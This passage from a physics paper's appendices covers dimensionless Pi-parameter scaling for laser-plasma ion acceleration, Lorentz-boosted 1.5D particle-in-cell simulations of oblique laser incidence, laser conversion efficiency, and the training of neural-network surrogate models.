work, a Gaussian profile was assumed for the electromagnetic wave, leaving the laser frequency \(\omega_{\text{L}}\), the pulse length \(\tau_{\text{L}}\), and the corresponding electric peak field \(E_{0}\) as variable quantities. The initial plasma distribution is defined as a homogeneous slab with particle density \(n_{0}\) and a thickness \(d_{\text{T}}\) with exponential decaying pre-plasma and skirt. The exact relations are given in section II.2. Keeping these initial conditions fixed allows us to apply the Buckingham \(\Pi\) Theorem to the Maxwell-Vlasov system of equations. This results in dimensionless quantities \(\Pi_{i}\) which are capable of describing all dimensional quantities inside the equation system. The dimensional quantities are given in Table 4. 
\begin{table} \begin{tabular}{c c c} \hline Quantity & Dimensions & Type \\ \hline \(\tau\) & T\({}^{1}\) & \\ \(L\) & L\({}^{1}\) & \\ \(q/m\) & C\({}^{1}\) T\({}^{1}\) M\({}^{-1}\) & Primary \\ \(E_{0}\) & M\({}^{1}\) L\({}^{1}\) C\({}^{-1}\) T\({}^{-3}\) & \\ \(\omega\) & T\({}^{-1}\) & Primary \\ \(\mu_{0}\) & M\({}^{1}\) L\({}^{1}\) T\({}^{-2}\) C\({}^{-2}\) & Primary \\ \(\varepsilon_{0}\) & M\({}^{-1}\) L\({}^{-3}\) T\({}^{4}\) C\({}^{2}\) & Primary \\ \(n_{\alpha}\) & C\({}^{1}\) T\({}^{1}\) L\({}^{-3}\) & \\ \hline \end{tabular} \begin{tabular}{c c} \hline T: Time, L: Length, C: Current, M: Mass \\ \hline \end{tabular} \end{table} Table 4: Overview of the dimensional quantities of the Maxwell-Vlasov EQS. Dimensions are listed in SI base dimensions. Buckingham \(\Pi\) parameters are calculated by defining primary quantities which are used multiplicatively in each parameter.

Using these dimensional quantities, the following \(\Pi_{i}\) are determined: \[\Pi_{1} =\omega_{\mathrm{L}}\tau_{\mathrm{L}} \tag{10}\] \[\Pi_{2} =\omega_{\mathrm{L}}L\sqrt{\mu_{0}\varepsilon_{0}}=\frac{\omega_{ \mathrm{L}}L}{c}\] (11) \[\Pi_{3} =\frac{q_{\alpha}n_{\alpha}}{\varepsilon_{0}m_{\alpha}\omega_{ \mathrm{L}}^{2}}=\begin{cases}\frac{\hat{n}_{e}e^{2}}{\varepsilon_{0}m_{ \mathrm{e}}\omega_{\mathrm{L}}^{2}}&\text{for electrons}\\ &\\ \frac{\hat{n}_{\alpha}Z_{\alpha}^{2}e^{2}}{\varepsilon_{0}m_{\alpha}\omega_{ \mathrm{L}}^{2}}&\text{for ions}\end{cases}\] (12) \[\Pi_{4} =\frac{q_{\alpha}E_{0}}{m_{\alpha}\omega_{\mathrm{L}}}\sqrt{\mu _{0}\varepsilon_{0}}=\begin{cases}\frac{E_{0}}{\omega_{\mathrm{L}}c}\frac{e}{ m_{\mathrm{e}}}&\text{for electrons}\\ &\\ \frac{E_{0}}{\omega_{\mathrm{L}}c}\frac{Z_{i}e}{m_{i}}&\text{for ions} \end{cases} \tag{13}\] The theorem also states that the number of resulting dimensionless parameters is lower than the number of dimensional parameters, reducing the complexity of the model.

#### a.3.3 Interpretation of the dimensionless quantities

These quantities are sufficient to describe and condition the EQS from a mathematical standpoint. From a physical standpoint, this also creates valuable insight. \(\Pi_{1}\) gives the number of \(\vec{E}\)-oscillations in the laser pulse and \(\Pi_{2}\) the irradiation size of the laser. \(\Pi_{3}\) correlates the laser with the target, since it is the ratio of the particle density to the critical plasma density defined by the laser. \(\Pi_{4}\) describes the particle dynamics inside the laser's amplitude for each species. For electrons, \(\Pi_{4}\) is identical to the dimensionless quiver velocity \(a_{0}\). The meaning is equivalent for the different ion species.
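As a numerical illustration of the electron-species expressions above (the input values in the example call are arbitrary and carry no physical significance for this work):

```python
import numpy as np
from scipy.constants import c, e, epsilon_0, m_e

def pi_parameters_electrons(tau_L, L, lambda_L, n_e, E_0):
    """Dimensionless Pi parameters for the electron species, following the definitions above."""
    omega_L = 2 * np.pi * c / lambda_L
    pi_1 = omega_L * tau_L                               # number of field oscillations in the pulse
    pi_2 = omega_L * L / c                               # irradiation size in laser units
    pi_3 = n_e * e**2 / (epsilon_0 * m_e * omega_L**2)   # electron density over critical density
    pi_4 = e * E_0 / (m_e * omega_L * c)                 # dimensionless quiver velocity a_0
    return pi_1, pi_2, pi_3, pi_4

# Example call: 30 fs pulse, 5 um focus, 800 nm, n_e = 1e29 m^-3, E_0 = 1e13 V/m
print(pi_parameters_electrons(30e-15, 5e-6, 800e-9, 1e29, 1e13))
```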
Writing down the EQS and substituting the \(\Pi\) parameters makes their importance apparent: \[\tilde{\nabla}\cdot\hat{\vec{B}} =0 \tag{14}\] \[\tilde{\nabla}\cdot\hat{\vec{E}} =\underbrace{\int\sum_{\alpha}\frac{\Pi_{2}\cdot\Pi_{3\alpha}}{ \Pi_{4\alpha}}\,\mathrm{d}^{3}\,\tilde{\vec{p}}}_{=0\text{ for }t=0}\] (15) \[\tilde{\nabla}\times\hat{\vec{E}} =-\frac{\Pi_{2}}{\Pi_{1}}\frac{\partial\hat{\vec{B}}}{\partial \hat{\vec{t}}}\] (16) \[\tilde{\nabla}\times\hat{\vec{B}} =\frac{\Pi_{2}}{\Pi_{1}}\frac{\partial\hat{\vec{E}}}{\partial \hat{\vec{t}}}+\int\sum_{\alpha}\frac{4\pi\Pi_{2}\Pi_{3\alpha}\tilde{\vec{p}} }{\sqrt{\hat{p}^{2}\Pi_{4\alpha}^{2}+1}}\hat{f}_{\alpha}\,\mathrm{d}^{3}\, \tilde{\vec{p}}\] (17) \[0 =\frac{1}{\Pi_{1}}\frac{\partial\hat{f}_{\alpha}}{\partial\hat{ \vec{t}}}+\frac{1}{\Pi_{2}}\frac{\Pi_{4\alpha}\tilde{\vec{p}}}{\sqrt{\hat{p} ^{2}\Pi_{4\alpha}^{2}+1}}\frac{\partial\hat{f}_{\alpha}}{\partial\hat{\vec{r}}}\] \[+\left(Z_{\alpha}\hat{\vec{E}}+\frac{\Pi_{4\alpha}}{\sqrt{\hat{p }^{2}\Pi_{4\alpha}^{2}+1}}\tilde{\vec{p}}\times\hat{\vec{B}}\right)\frac{ \partial\hat{f}_{\alpha}}{\partial\hat{p}} \tag{18}\] If these parameters are constant, then the equations are all the same and therefore behave the same. This results in the same time development of the system and therefore yields the same results. One can say that for constant \(\Pi_{i}\) areas of iso-dynamics exist, finally simplifying any model approaches by reducing the dimensions to be examined. Models therefore only need these 4 parameters to precisely determine a system. #### a.3.4 Correlating dimensionless parameters and simulation input The system, therefore, has a dedicated number of \(\Pi\) Parameters which have to be taken into account: \(\Pi_{1}\) and \(\Pi_{2}\) are laser-relevant quantities and therefore particle species independent. \(\Pi_{3}\) and \(\Pi_{4}\) describe quantities of the particle species, therefore introducing a multiplicity in the parameter, denoted by \(\alpha\). In the case investigated here, the multiplicity is 4: electrons, oxygen, hydrogen, and deuterium. The system is initialized with the same spatial distribution function \(\hat{f}_{\alpha}\) for each species. To mimic ionization and mixture some conditions apply: \[N_{\mathrm{O}}=2\times N_{H/D}\quad\text{and}\quad N_{e}=Z_{O}^{\mathrm{eff}}+ Z_{H/D} \tag{19}\] Taking these assumptions into account resolves the multiplicity and the corresponding \(\Pi\)s can be expressed with a multiplicative factor. The construction, including the multiplicative factors and the needed parameters, are given in Table 5. Red and green mark the relevant, varying parameters to be taken into account. ### Mapping physical to dimensionless parameters As stated in the main body of this work, several physical input quantities are used. They are chosen based on keeping datasets consistent and comparable. Therefore some parameters are sampled which do not exist in 1D. 
This also ensures that the data can be broken down into the \(\Pi_{i}\) with the following relations. It is important to note that of the \(\Pi_{4}\) possibilities only the electron variant (equivalent to \(a_{0}\)) has to be passed to the PIC code. \[\Pi_{1} =\frac{2\pi c\tau_{\mathrm{L}}}{\lambda_{\mathrm{L}}} \tag{10}\] \[\Pi_{2} =\frac{2\pi\mathrm{FWHM}}{\lambda_{\mathrm{L}}}\] (11) \[\Pi_{3} =\frac{Z_{\mathrm{eff}}^{2}e^{2}n_{0}\lambda_{\mathrm{L}}^{2}}{ \varepsilon_{0}4\pi^{2}m_{0}c^{2}}\] (12) \[\Pi_{4} =\left(\frac{E_{\mathrm{L}}\lambda_{\mathrm{L}}^{2}\sin\left( \Theta_{\mathrm{L}}\right)}{\tau_{\mathrm{L}}\pi\mathrm{FWHM}^{2}\cdot 1.37 \times 10^{18}}\right)^{2} \tag{13}\] This culminates in a needed dimensionality of 9 for the list of parameters: 4 \(\Pi_{i}\), 2 parameters to deal with the ambiguity of \(Z_{O}^{\mathrm{eff}}\) and the mixture parameter, 1 parameter for the plasma slab thickness \(d_{T}\) (the particle density is fixed), and 2 for dealing with the laser's polarization: the selection of p or s linear polarization and, for this distinction to matter, the variation of the incidence angle \(\Theta_{L}\). Taking the mapping into account (Eqs. (10)-(13)), a proper physical sampling includes:

1. Ionization of oxygen
2. Mixtures (deuterium vs hydrogen)
3. Laser Polarization
4. Laser Energy / Joule
5. Laser Pulse Time / second
6. Laser Irradiation Size / micron
7. Laser Wavelength / meter
8. Laser Incidence Angle / Degree (to the plasma normal)
9. Plasma Slab Thickness

These 9 parameters have the same dimensionality as the parameter space calculated by the \(\Pi_{i}\), which is necessary since the construction of dedicated quantities (especially the electric field of the laser) cannot be determined easily and a composition of these parameters has to be taken into account.

\begin{table} \begin{tabular}{l l} \hline \hline Parameter & Definition \\ \hline \(\Pi_{1}\) & \(\omega_{L}\tau_{\mathrm{L}}\) \\ \(\Pi_{2}\) & \(\omega_{L}L/c\) \\ \hline \(\Pi_{3O}\) & \(Z_{O}^{\mathrm{eff}}/m_{O}\times n_{O}/{\omega_{L}}^{2}\) \\ \(\Pi_{3e}\) & \(\Pi_{3O}\times\left(Z_{O}^{\mathrm{eff}}+2\right)\times\frac{m_{O}}{m_{e}}\cdot \frac{q_{\alpha}}{e^{2}\omega}\) \\ \(\Pi_{3H}\) & \(\Pi_{3O}\times 2\mathrm{mix}\times\frac{m_{O}}{m_{H}}\cdot\frac{q_{H}}{e^{-2} \omega}\) \\ \(\Pi_{3D}\) & \(\Pi_{3O}\times 2\left(1-\mathrm{mix}\right)\times\frac{m_{O}}{m_{D}}\cdot\frac{q_{ \alpha}}{e^{-2}\omega}\) \\ \hline \(\Pi_{4e}\) & \(q_{e}/m_{e}\times E_{0}/\omega_{L}c\) (\(a_{0}\)) \\ \(\Pi_{4H}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{H}}\cdot\frac{q_{H}}{\hat{\vec{p}}}\) \\ \(\Pi_{4D}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{D}}\cdot\frac{q_{\alpha}}{\hat{\vec{p}}}\) \\ \(\Pi_{4O}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{O}}\cdot\frac{2\hat{O}}{q_{e}}\) \\ \hline \hline \end{tabular} \end{table} Table 5: Construction of \(\Pi\) parameters.

## Appendix B Parameter Ranges

As mentioned in section II.2.2, two paradigms are relevant for the selection of the parameter ranges. The class of petawatt laser systems we based our work on uses mainly linearly polarized laser light and is capable of varying the incidence angle. Taking this into account, we get two possibilities for the laser's polarization: s-polarization and p-polarization. Similarly, we can use angles from \(0^{\circ}\) to less than \(90^{\circ}\).
At \(90^{\circ}\) the laser is not hitting the target and is traveling parallel to the plasma surface, we, therefore, chose to cut the interval at \(85^{\circ}\). The laser energy was selected to cover a large area to increase the comparability of the model with different laser systems. At the conceptualization phase of this study, it was unreasonable to assume high repetition rate experimentation with much larger systems (e.g. GSI's PHELIX system [51; 52]), since the currently achievable repetition rates were too low. This might change in the future, such that higher energies are realistic, and the model base has to be expanded under such cases. The most critical parameter is the pulse length. As our reference value, we selected the FWHM in the time domain of a pure Gaussian pulse. Firstly, the approximation of a pure Gaussian pulse is not necessarily true for a technically implemented laser. If the FWHM according to Equation 4 is not used, then the value has to be adjusted accordingly. Due to calculation time issues of the underlying PIC models, we reduced the selected times to the interval from \(15\,\mathrm{fs}\) to \(150\,\mathrm{fs}\). We know that this time can be significantly larger, but high repetition systems can operate with low pulse length variables. We also acknowledge, that our lower simulation border for the time is close to the bandwidth-limited pulse limit, but we wanted to have some lower data points to force the interpolation into good behavior and therefore mathematically overshot into the lower regime. The upper pulse length boundary is also the first parameter we want to increase in further studies since technical laser systems do need a larger pulse length to apply this model. The focus FWHM was then sampled according to the definition of the laser \(a_{0}\) conditions which we applied to our parameters. We made sure to stay in the TNSA regime and prevented the laser \(a_{0}\) to be smaller than one and keep the focus still realistically small with \(2\,\mathrm{\SIUnitSymbolMicro m}\) as the lower range cut-off. The selected wavelengths are larger than those used in engineered systems and also are somehow continuously sampled from this larger range. The reason for this is the importance of the wavelength parameter following the similitude relations, which are dependent on the laser wavelength in every component. Concerning the target, we chose the thickness according to the parameters of the physical implementation of a liquid jet, which is currently under development. The mixture can only vary between 0 and \(100\,\mathrm{\char 37}\). Again, the effective charge of the particles plays an important role. We started with fully ionized oxygen and found traits of the multi-species effect during our investigation. While discussing the results, we generalized the effective charge discussion but were not able to properly simulate different effective ionization levels. This is due to a lack of proper ionization models (also beyond the scope of this study) and limited numerical resources. This would also be a parameter that could be further improved in additional studies. ## Appendix C Transversal Lorentz Boosted 1.5D PIC Simulations Modeling oblique laser incidence onto a target is inherently at least a 2D problem, which requires substantially more computational power than a similar 1D geometry to simulate. Bourdier [53] thus proposed a method in which a relativistic Lorentz boost is applied to the frame of reference in the simulation. 
This method has later been employed by Gibbon et al. [54] in a PIC code. Here, we would like to present the implementation of this technique yet again for a modern PIC code while also correcting some mistakes in the calculations by Gibbon et al.. A schematic of the general principle is shown in Figure 11. To obtain the results in the lab frame a back transformation must be applied to the diagnostics obtained from the simulation. For finding the transformations, a simple Lorentz boost in \(y\)-direction by the velocity \(v_{y}=c\cdot\sin(\theta)\) is applied. In matrix form, this can be represented by: \[\Lambda=\begin{pmatrix}1/\cos(\theta)&0&-\tan(\theta)&0\\ 0&1&0&0\\ -\tan(\theta)&0&1/\cos(\theta)&0\\ 0&0&0&1\end{pmatrix}\;, \tag{10}\] since \(\gamma_{0}=\left(1-(v_{y}/c)^{2}\right)^{-1/2}=1/\cos(\theta)\). This transformation matrix can be used to transform all the quantities of the particles and the electromagnetic fields. Indicating quantities in the transformed system with a prime, we find after carrying out all transformations \[\begin{split} k^{\prime}_{y}&=0\\ \omega^{\prime}_{\text{L}}&=\omega_{\text{L}}/\gamma_{0}\\ a^{\prime}_{0}&=a_{0}\;,\end{split} \tag{11}\] where \(k^{\prime}_{y}\) is the y-component of the wave vector in the boosted system, showing that, indeed, the laser is now at normal incidence. Note that the dimensionless laser amplitude \(a_{0}\) is invariant under the transformation [54]. Further, denoting PIC code units with a tilde, we find \[\begin{split}\tilde{x}^{\prime}&=\tilde{x}/\gamma_{0}\\ \tilde{t}^{\prime}&=\tilde{t}/\gamma_{0}^{2}\end{split} \tag{12}\] giving a re-scaling of both the simulation time as well as the cell grid. The initial particle density is also affected by \[\tilde{n}^{\prime}_{0}=\tilde{n}_{0}\cdot\gamma_{0}^{3}\;. \tag{13}\] With these conditions, the particles can be initialized in the boosted frame. The relative velocity \(v_{y}\) is added as a permanent drift which is handled and relativistically added to the particles by the code. From the diagnostics in the simulation, we can obtain desired quantities via a back transformation. For the particle kinetic energies, we find using the energy-momentum relation: \[\begin{split}\tilde{E}&=\gamma_{0}(\tilde{E}^{\prime }+\tilde{v}_{y}\tilde{p}^{\prime}_{y})\\ &=\gamma_{0}\left(\frac{1}{m_{\text{e}}c^{2}}\sqrt{{p^{\prime}}^ {2}c^{2}+(m_{0}c^{2})^{2}}+\tilde{v}_{y}\tilde{p}^{\prime}_{y}\right)\\ \Rightarrow E_{\text{kin}}&=\gamma_{0}m_{\text{e}}c^{2 }\left(\sqrt{\tilde{p}^{\prime 2}+\frac{m_{0}^{2}}{m_{\text{e}}^{2}}}+\tilde{v}_{y} \tilde{p}^{\prime}_{y}\right)-m_{0}c^{2}\;,\end{split} \tag{14}\] where \(m_{0}\) is the particle rest mass. Noting that \(\tilde{B}^{\prime}_{x}=0\), we can find relations to recover the fields of the laser. 
The non-zero fields are: \[\begin{split}\text{For s-polarization:}\\ \tilde{E}_{z}&=\tilde{E}^{\prime}_{z}\\ \tilde{B}_{x}&=\tilde{v}_{y}\tilde{E}^{\prime}_{z}\\ \tilde{B}_{y}&=\tilde{B}^{\prime}_{y}/\gamma_{0}\\ \text{For p-polarization:}\\ \tilde{E}_{x}&=\tilde{E}^{\prime}_{x}-\tilde{v}_{y} \tilde{B}^{\prime}_{z}\\ \tilde{E}_{y}&=\tilde{E}^{\prime}_{y}/\gamma_{0}\\ \tilde{B}_{z}&=\tilde{B}^{\prime}_{z}-\tilde{v}_{y} \tilde{E}^{\prime}_{x}\end{split} \tag{15}\] Using the field transformations and assuming that reflection at the plasma surface does not change polarization, we find for the absolute magnitude of the Poynting vector: \[|\vec{S}|=|\vec{S}^{\prime}|\cdot\gamma_{0}^{2}\;, \tag{16}\] with which the relative absorption of the laser into the plasma can be calculated by dividing the incoming Poynting flux by the outgoing Poynting flux. It should be noted that while the Lorentz boosted frame method can replicate incidence angle-based behavior, it cannot replace a 2D or even 3D simulation on all accounts [54]. Firstly, in the general case, all physical quantities depend separately on the transformed coordinates \(x,y,z,t,p_{x},p_{y},p_{z}\). Thus, the Lorentz-boosted simulation can only be used for a problem independent of \(y\) and \(z\). Additionally, reducing the geometry after the boost to 1D limits the spatial dynamics of the particles. Since only the \(x\)-axis is present, all particles (while having 3D velocities) can only move along a straight line (i.e. have only Figure 11: Schematic of the Lorentz boosted simulation frame versus the implied lab frame. In the simulation frame, the laser appears to be at normal incidence onto the target while the particles appear to drift in negative \(y\)-direction with velocity \(v_{y}\). 1 spatial dimension). This disregards the angular spread at the back of the target such that the particles can be accelerated for longer times and thus end up with higher energies compared to a similar 2D simulation. Distinctly 2D effects such as hole boring can also not be modeled accurately. To illustrate the capabilities of this method, however, the relative laser absorption of a p-polarized laser impinging on a hydrogen plasma target was measured for varying laser incidence angles using the above method in the Smilei PIC code. The resulting absorption curve is shown in Figure 12. The results agree well with 2D simulations by Cui et al. [55] using a similar target and laser (see Figure 14 for a comparison). ### Explicit Lorentz Boost for oblique Laser Incidence In the following section we discuss the full transformation in more detail, and explicitly calculate the relations we mentioned before. Starting from the transformation matrix in Equation C1 the full derivation will be done for all quantities in the system. Firstly, the four-position \(R\), the four-momentum \(P\), the four-wave vector \(K\) and the four-current \(J\) are given as follows: \[\begin{split} R&=(ct,x,y,z)^{\top}\\ P&=(\gamma m_{0}c,p_{x},p_{y},p_{z})^{\top}\\ K&=(\omega_{\text{L}}/c,k\cdot\cos(\theta),k\cdot \sin(\theta),0)^{\top}\\ J&=(c\rho,j_{x},j_{y},j_{z})^{\top}\end{split} \tag{10}\] where \(k=\omega_{\text{L}}/c\) is the magnitude of the wave vector, \(\rho\) is the charge density and \(\tilde{j}\) is the current density. Here, the geometry of the wave vector from Figure 11 has already been applied, reducing the wave vector to two spatial dimensions. By left multiplication of \(\Lambda\) these quantities can be transformed into the boosted frame. 
This multiplication yields \[\begin{split} R^{\prime}&=(\gamma_{0}(ct-y\beta_{0 }),x,\gamma_{0}(y-ct\beta_{0}),z)^{\top}\\ P^{\prime}&=(\gamma_{0}(\gamma m_{0}c-p_{y}\beta_{0 }),p_{x},\gamma_{0}(p_{y}-\gamma m_{0}c\beta_{0}),p_{z})^{\top}\\ K^{\prime}&=(\omega_{\text{L}}/(c\gamma_{0}),k_{0}/ \gamma_{0},0,0)^{\top}\\ J^{\prime}&=(\gamma_{0}(c\rho-j_{y}\beta_{0}),j_{x},\gamma_{0}(j_{y}-c\rho\beta_{0}),j_{z})^{\top}\end{split} \tag{11}\] where a prime indicates quantities in the transformed system and \(\beta_{0}=v_{y}/c=\sin(\theta)\). Most importantly here we find \(k^{\prime}_{y}=0\) and \(\omega^{\prime}_{\text{L}}=\omega_{\text{L}}/\gamma_{0}\). Also, since the particles are assumed cold at \(t=0\), we find for the initial density \(\rho^{\prime}_{0}=\gamma_{0}\rho_{0}\). The next transformation is for the electromagnetic fields. Here, we differentiate between s- and p-polarized incidence lasers. To transform the electric and magnetic fields of the incoming laser, the electromagnetic tensor is used: \[F^{\mu\nu}_{\text{s-pol}} =\begin{pmatrix}0&0&0&-E_{z}/c\\ 0&0&0&B_{y}\\ 0&0&0&-B_{x}\\ E_{z}/c&-B_{y}&B_{x}&0\end{pmatrix} \tag{12}\] \[F^{\mu\nu}_{\text{p-pol}} =\begin{pmatrix}0&-E_{x}/c&-E_{y}/c&0\\ E_{x}/c&0&-B_{z}&0\\ E_{y}/c&B_{z}&0&0\\ 0&0&0&0\end{pmatrix}\;. \tag{13}\] The Lorentz transformation of such a tensor is given by: \[F^{\mu^{\prime}\nu^{\prime}}=\Lambda^{\mu^{\prime}}_{\;\;\;\mu}\Lambda^{\nu^{ \prime}}_{\;\;\;\nu}F^{\mu\nu}\;, \tag{14}\] where a prime again indicates quantities in the transformed system. The calculated fields are \[\left.\begin{aligned} E^{\prime}_{x}&=0\\ E^{\prime}_{y}&=0\\ E^{\prime}_{z}&=\gamma_{0}(E_{z}-v_{y}B_{x})\\ B^{\prime}_{x}&=\gamma_{0}(B_{x}-E_{z}v_{y}/c^{2})\\ B^{\prime}_{y}&=B_{y}\\ B^{\prime}_{z}&=0\\ E^{\prime}_{x}&=\gamma_{0}(E_{x}+v_{y}B_{z})\\ E^{\prime}_{y}&=E_{y}\\ E^{\prime}_{z}&=0\\ B^{\prime}_{x}&=0\\ B^{\prime}_{y}&=0\\ B^{\prime}_{z}&=\gamma_{0}(B_{z}+E_{x}v_{y}/c^{2})\end{aligned}\right\} \text{s-pol} \tag{15}\] Figure 12: Simulation of laser incidence angles between \(0^{\circ}\) and \(85^{\circ}\). The plot shows the incidence angle versus the relative absorption of a laser into a hydrogen plasma target (dotted red line) as well as the maximum proton kinetic energy behind the target (blue solid line). The laser impinges on the target with p-polarized fields. Classical resonance absorption, also known as the Desinov curve [56], is shown as a dashed line. where \(E^{\prime}_{x},B^{\prime}_{x}\stackrel{{!}}{{=}}0\) since the laser is at normal incidence in the boosted system. For absorption measurements, it is useful to have a look at the transformation of the Poynting Vector \(\vec{S}\). We first define in vacuum \[\vec{S}=\frac{1}{\mu_{0}}\vec{E}\times\vec{B}\;, \tag{109}\] where \(\mu_{0}\) is the vacuum permeability. As an example, we will only present the calculation in the p-polarization case. The s-polarization calculation is equivalent. We find \[\vec{S}_{\text{p-pol}} =\frac{1}{\mu_{0}}\left(E_{y}B_{z},-E_{x}B_{z},0\right)^{\top} \tag{110}\] \[\Rightarrow\vec{S}^{\prime}_{\text{p-pol}} =\frac{1}{\mu_{0}}(E^{\prime}_{y}B^{\prime}_{z},\underbrace{-E^{ \prime}_{x}B^{\prime}_{z}}_{=0},0)^{\top}\] (111) \[=\frac{1}{\mu_{0}}\left(E^{\prime}_{y}B^{\prime}_{z},0,0\right)^{ \top}\;. 
\tag{112}\] We hence find for the magnitude of the transformed Poynting Vector \[|\vec{S}^{\prime}_{\text{p-pol}}| =\frac{1}{\mu_{0}}\sqrt{E^{\prime 2}_{y}B^{\prime 2}_{z}} \tag{113}\] \[=\frac{1}{\mu_{0}c}E^{\prime 2}_{y}\;, \tag{114}\] since \(|\vec{B}|=|\vec{E}|/c\). On the other hand, inserting the transformation into \(\vec{S}\), we find \[\vec{S}_{\text{p-pol}} =\frac{1}{\mu_{0}}\begin{pmatrix}E^{\prime}_{y}\gamma_{0}\left(B^ {\prime}_{z}-E^{\prime}_{x}\frac{v_{y}}{c^{2}}\right)\\ -\gamma_{0}\left(E^{\prime}_{x}-v_{y}B^{\prime}_{z}\right)\gamma_{0}\left(B^{ \prime}_{z}-E^{\prime}_{x}\frac{v_{y}}{c^{2}}\right)\end{pmatrix} \tag{115}\] \[=\frac{1}{\mu_{0}}\begin{pmatrix}\gamma_{0}E^{\prime}_{y}B^{ \prime}_{z}\\ \gamma_{0}^{2}v_{y}B^{\prime 2}_{z}\\ 0\end{pmatrix} \tag{116}\] such that for the magnitude we have \[|\vec{S}_{\text{p-pol}}| =\frac{\gamma_{0}}{\mu_{0}}\sqrt{E^{\prime 2}_{y}B^{\prime 2}_{z}+ \gamma_{0}^{2}v_{y}^{2}B^{\prime 4}_{z}} \tag{117}\] \[=\frac{E^{\prime 2}_{y}\gamma_{0}}{\mu_{0}c}\sqrt{1+\gamma_{0}^{2} \frac{v_{y}^{2}}{c^{2}}}\;. \tag{118}\] The term in the square root can be resolved elegantly once we remind ourselves of the definition of \(v_{y}\): \[1+\gamma_{0}^{2}\frac{v_{y}^{2}}{c^{2}} =1+\frac{1}{\cos^{2}(\theta)}\frac{c^{2}\sin^{2}(\theta)}{c^{2}} \tag{119}\] \[=\frac{1}{\cos^{2}(\theta)}\] (120) \[=\gamma_{0}^{2}\;, \tag{121}\] and with that we have \[|\vec{S}_{\text{p-pol}}| =\frac{E^{\prime 2}_{y}\gamma_{0}}{\mu_{0}c}\;\gamma_{0} \tag{122}\] \[=|\vec{S}^{\prime}_{\text{p-pol}}|\cdot\gamma_{0}^{2}\;. \tag{123}\] Next, let us consider the transformed quantities in code units, so as to initialize the particles correctly in the PIC code. For the space coordinate, we find \[\tilde{x}^{\prime}=\frac{\omega^{\prime}x^{\prime}}{c}=\tilde{x}/\gamma_{0}\;, \tag{124}\] while for the time coordinate, since \(\tilde{y}^{\prime}\stackrel{{!}}{{=}}0\): \[0\stackrel{{!}}{{=}}\tilde{y}^{\prime} =\frac{\omega^{\prime}}{c}\gamma_{0}(y-ct\beta_{0}) \tag{125}\] \[=\tilde{y}-\tilde{t}\tilde{v}_{y}\] (126) \[\Rightarrow\tilde{t}^{\prime} =\omega^{\prime}\gamma_{0}\left(t-\frac{y}{c}\beta_{0}\right)\] (127) \[=\tilde{t}-\tilde{y}\tilde{v}_{y}\] (128) \[=\tilde{t}-\tilde{t}\tilde{v}_{y}^{2}\] (129) \[=\tilde{t}/\gamma_{0}^{2} \tag{130}\] Finally, the critical density transforms as \[\frac{n^{\prime}_{\text{c}}}{n_{\text{c}}}=\frac{\omega^{\prime 2}}{\omega^{2}}= \frac{1}{\gamma_{0}^{2}}\;, \tag{131}\] such that the initial particle densities in code units become \[\tilde{n}^{\prime}_{0}=\frac{n^{\prime}_{0}}{n^{\prime}_{\text{c}}}=\tilde{n} _{0}\cdot\gamma_{0}^{3}\;. \tag{132}\] A verification plot for the Lorentz Boost method is displayed in Figure 13 for irradiation under an oblique angle. ## Appendix D Laser Conversion Efficiency The laser conversion efficiency is an important quantity to characterize particle acceleration and especially laser-plasma acceleration. In order to retrieve information about the energy in the output spectrum of a TNSA Figure 13: Example result for a Lorentz-boosted simulation with an angle of 40 degrees. The dashed line denotes the fit of Mora’s model Mora (1966) to the data. experiment, consider first a spectrum \(\mathrm{d}N/\mathrm{d}E\) recorded in multiple energy bins of width \(\Delta E\). In this case, the number of particles in bin \(i\) is given by the bin's height multiplied by its width, i.e. \[N_{i}=\left(\frac{\mathrm{d}N}{\mathrm{d}E}\right)_{i}\cdot\Delta E\;. 
\tag{10}\] Hence, the total energy of the particles within the bin can be approximated by multiplying the number of particles in the bin by the bin's central energy \(E_{i}\). Summing over all bins yields the total energy of the particles \[E_{\mathrm{tot}}=\sum_{i}\left(\frac{\mathrm{d}N}{\mathrm{d}E}\right)_{i}\cdot\Delta E\cdot E_{i}\;, \tag{11}\] which can be generalized in the continuous limit \(\Delta E\to 0\), giving \[E_{\mathrm{tot}}=\int_{0}^{\infty}\frac{\mathrm{d}N}{\mathrm{d}E}\cdot E\,\mathrm{d}E\;. \tag{12}\] Concretely, adjusting for the output format of the neural network models, the total energy is given by \[E_{\mathrm{tot}}=V\cdot\int_{0}^{E_{\mathrm{max}}}\exp\left(\ln\left(\frac{\mathrm{d}n}{\mathrm{d}E}\right)\right)\cdot E\,\mathrm{d}E\;, \tag{13}\] where \(\ln\left(\frac{\mathrm{d}n}{\mathrm{d}E}\right)\) and \(E_{\mathrm{max}}\) are given by the neural network models and \(V\) is a unit volume. To obtain a measure for the energy conversion efficiency, the above integral is then normalized by the laser pulse energy \(E_{\mathrm{L}}\), resulting in the maximization problem shown in Eq. (6). ## Appendix E Neural Network Training and Preparation In this section, we discuss the chosen parameter ranges for the surrogate models based on neural networks. Training surrogate models is a tedious and numerically expensive task. This means that we have to be clear about the parameters and data used for the training process. We will first focus on the data preparation task, and second on the numerical hyperparameters chosen for our model. Both parts are important if we want to create fast-converging models. ### Data preparation Neural networks can only be as good as the data used for training them. Convergence is important and the data, therefore, have to be prepared properly. We can only investigate the multi-species effect and subsequent optimizations if we take the full spectrum into account. The spectral data for the output spectrum are taken on a logarithmic scale since the count rates vary over several orders of magnitude. The logarithmic data can directly be used to train a model. We tried using the data directly, but convergence was problematic. This is due to the noise of the data and the mixture-dependent shifts of the multi-species plateaus. The signal variation in both cases is similar and it is therefore difficult for the network to fit the dependencies. To mitigate this we applied a Savitzky-Golay filter [57] with a window size of 7 points and a 3rd-order polynomial. This filter decreased the noise-based fluctuations and allowed subsequent convergence. We display a comparison of filtered and unfiltered data in Figure 15, which shows that the major behavior of the curves is reproduced while the bin-to-bin fluctuations in the mid to high energy range are minimized. ### Numerical Parameters, Training and Topology As none of the architectural parameters for these models were known, some overarching hyperparameters were decided first. For a regression problem, the Rectified Linear Unit (ReLU) activation function is widely used and was added to every layer of the network except the output layer, which used the identity activation. Similarly, we chose the mean squared error, suited for regression problems, as the loss, and it was minimized using the Adam optimizer with \(\beta_{1}=0.9\), \(\beta_{2}=0.999\) and \(\epsilon=1\times 10^{-7}\).
